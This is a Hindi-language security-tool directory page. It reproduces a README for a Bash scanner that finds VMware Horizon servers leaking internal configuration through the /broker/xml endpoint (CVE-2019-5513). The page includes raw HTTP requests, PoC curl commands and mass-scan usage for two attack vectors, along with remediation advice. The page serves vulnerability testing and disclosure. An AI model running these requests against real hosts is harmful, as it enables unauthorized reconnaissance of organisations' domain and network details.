Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/sudosu01/cve-2019-5513-scanner
टोहीभेद्यता स्कैनरशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubsudosu01/cve-2019-5513-scanner

CVE-2019-5513-scanner

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

23 महीने पहलेअभी तक समीक्षित नहीं

VMWare Horizon कनेक्शन सर्वर अक्सर किसी संगठन के वर्चुअल डेस्कटॉप वातावरण (VDI) के लिए इंटरनेट-सामना करने वाले गेटवे के रूप में उपयोग किया जाता है। हाल तक, इनमें से अधिकांश इंस्टॉलेशन ने कनेक्शन सर्वर का आंतरिक नाम, गेटवे का आंतरिक IP पता और Active Directory डोमेन को अनधिकृत हमलावरों को उजागर किया।

साझा करें

VMware Horizon /broker/xml भेद्यता स्कैनर

Security Bash License

VMware Horizon Connection Server के /broker/xml एंडपॉइंट में अप्रमाणित जानकारी प्रकटीकरण भेद्यताओं का पता लगाने के लिए एक उच्च-प्रदर्शन मल्टी-थ्रेडेड स्कैनर।

📋 अवलोकन

VMware Horizon Connection Server एक XML API एंडपॉइंट (/broker/xml) को उजागर करता है जो प्रमाणीकरण की आवश्यकता के बिना संवेदनशील आंतरिक कॉन्फ़िगरेशन जानकारी लीक कर सकता है। यह स्कैनर दो आक्रमण वैक्टर का परीक्षण करके तेजी से कमजोर सर्वरों की पहचान करता है:

  1. खाली POST बॉडी (शून्य-दिवस खोज) — पूरी तरह से खाली POST अनुरोध भेजता है। सर्वर बिना किसी XML कमांड के कॉन्फ़िगरेशन डेटा लीक करता है।
  2. निर्मित XML (CVE-2019-5513) — प्रलेखित get-configuration XML कमांड का उपयोग करता है।

🔍 भेद्यता विवरण

क्या जानकारी लीक हो सकती है?

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<broker>
    <configuration>
        <broker-service-principal>
            <type>kerberos</type>
            <name>[email protected]</name>
        </broker-service-principal>
        <domain>corporate-domain.example.com</domain>
    </configuration>
</broker>

⚡ विशेषताएं

  • बहुत तेज़ — मल्टी-थ्रेडेड आर्किटेक्चर (डिफ़ॉल्ट 50 समवर्ती थ्रेड)
  • दोहरी प्रोटोकॉल परीक्षण — HTTPS (पोर्ट 443) और HTTP (पोर्ट 80) दोनों का एक साथ परीक्षण करता है
  • दो आक्रमण वैक्टर — खाली POST बॉडी (शून्य-दिवस) + निर्मित XML (CVE-2019-5513) का परीक्षण करता है
  • कम टाइमआउट — प्रति अनुरोध अधिकतम 5 सेकंड, कनेक्शन टाइमआउट 3 सेकंड
  • स्पष्ट आउटपुट — कमजोर होस्ट के लिए पूर्ण XML प्रतिक्रिया के साथ रंग-कोडित परिणाम
  • परिणाम निर्यात — -o विकल्प के साथ सभी निष्कर्षों को फ़ाइल में सहेजें
  • कोई निर्भरता नहीं — केवल curl का उपयोग करता है (अधिकांश सिस्टम पर मानक)

🚀 स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/sudosu01/CVE-2019-5513-scanner.git

cd vmware-horizon-scanner

# Make the script executable
chmod +x broker.sh

📖 उपयोग

मूल स्कैन

root@kitploit:~
./broker.sh -d targets.txt

अनुकूलित थ्रेड के साथ स्कैन करें (तेज़)

root@kitploit:~
./broker.sh -d targets.txt -t 100

परिणाम स्कैन करें और सहेजें

root@kitploit:~
./broker.sh -d targets.txt -t 100 -o results.txt

कमांड लाइन विकल्प

विकल्पविवरण
-d <file>आईपी पते/होस्टनामों की सूची वाली इनपुट फ़ाइल (प्रति पंक्ति एक)
-t <num>थ्रेड्स की संख्या (डिफ़ॉल्ट: 50)

इनपुट फ़ाइल प्रारूप (targets.txt)

root@kitploit:~
# Comments start with #
185.171.101.236
192.168.1.100
10.0.0.50
example-vmware.com

📊 उदाहरण आउटपुट

root@kitploit:~
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   VMware Horizon /broker/xml Vulnerability Scanner
   Multi-Threaded Mode - 50 threads
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] Testing: Empty POST (Zero-Day) + Crafted XML (CVE-2019-5513)
[*] Protocols: HTTPS + HTTP (both tested simultaneously)

[*] Scanning 3 hosts...

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 185.171.101.236 | VULNERABLE | HTTPS | EMPTY_POST
Response:
<?xml version="1.0" encoding="utf-8"?>
<broker>
    <configuration>
        <broker-service-principal>
            <type>kerberos</type>
            <name>TEST-SERVER$@DOMAIN</name>
        </broker-service-principal>
    </configuration>
</broker>
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[-] 192.168.1.100 | NOT VULNERABLE

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 10.0.0.50 | VULNERABLE | HTTP | CRAFTED_XML
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] SCAN COMPLETE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    Total hosts: 3
    Vulnerable: 2
    Not vulnerable: 1
    Time taken: 4 seconds

🔬 Burp Suite के साथ परीक्षण

मैन्युअल परीक्षण के लिए, यहां कच्चे अनुरोध हैं:

परीक्षण 1: खाली POST बॉडी (शून्य-दिवस)

root@kitploit:~
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 0

परीक्षण 2: निर्मित XML (CVE-2019-5513)

root@kitploit:~
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 115

<?xml version='1.0' encoding='UTF-8'?><broker version='10.0'><get-configuration></get-configuration></broker>

📝 PoC curl कमांड्स

खाली POST बॉडी

root@kitploit:~
curl -k -X POST "https://target/broker/xml" \
  -H "Content-Type: text/xml" \
  -H "User-Agent: VMware-Horizon-Client" \
  -d ''

निर्मित XML

root@kitploit:~
curl -k -X POST "https://target/broker/xml" \
  -H "Content-Type: text/xml" \
  -H "User-Agent: VMware-Horizon-Client" \
  --data-binary '<?xml version="1.0" encoding="UTF-8"?><broker version="10.0"><get-configuration></get-configuration></broker>'

🛡️ सुधार

VMware Horizon Connection Server को पैच किए गए संस्करण में अपग्रेड करें:

संस्करणनिर्धारित रिलीज़
7.x7.8 या बाद का
7.5.x7.5.2 या बाद का
6.x6.2.8 या बाद का

अतिरिक्त शमन:

  • /broker/xml एंडपॉइंट तक पहुंच को प्रतिबंधित करने के लिए नेटवर्क एक्सेस नियंत्रण लागू करें
  • इस एंडपॉइंट पर अप्रमाणित अनुरोधों को अवरुद्ध करने के लिए WAF नियमों का उपयोग करें
  • /broker/xml पर संदिग्ध POST अनुरोधों की निगरानी करें

🙏 श्रेय

यह उपकरण निम्नलिखित सुरक्षा शोधकर्ताओं के शोध पर आधारित है:

  • मूल CVE-2019-5513 खोज — Atredis Partners
  • Critical Start के Cory Mathews (स्वतंत्र खोज)

इस उपकरण में शून्य-दिवस की खोज

खाली POST बॉडी आक्रमण वेक्टर अतिरिक्त शोध के दौरान पहचाना गया था। मूल CVE के लिए एक निर्मित XML पेलोड की आवश्यकता थी; यह उपकरण खाली बॉडी विधि का भी परीक्षण करता है, जिसमें कोई पेलोड निर्माण की आवश्यकता नहीं है और इसे निष्पादित करना और भी सरल है।

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। उन सिस्टमों की अनधिकृत स्कैनिंग जो आपके स्वामित्व में नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है, कानूनों और विनियमों का उल्लंघन कर सकती है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानते हैं।

📄 लाइसेंस

MIT License

⭐ समर्थन

यदि आपको यह उपकरण उपयोगी लगता है, तो कृपया इसे GitHub पर एक स्टार दें!

टूल डाउनलोड करें
गुणमान
CVECVE-2019-5513
CVSS स्कोर5.3 (मध्यम)
वेक्टरAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
प्रभावित उत्पादVMware Horizon Connection Server 7.x before 7.8, 7.5.x before 7.5.2, 6.x before 6.2.8
लीक हुई जानकारीएक्टिव डायरेक्टरी डोमेन नाम, सेवा खाता नाम (मशीन खाता), आंतरिक होस्टनाम, गेटवे आईपी पते
-o <file>परिणाम सहेजने के लिए आउटपुट फ़ाइल
-hसहायता संदेश दिखाएं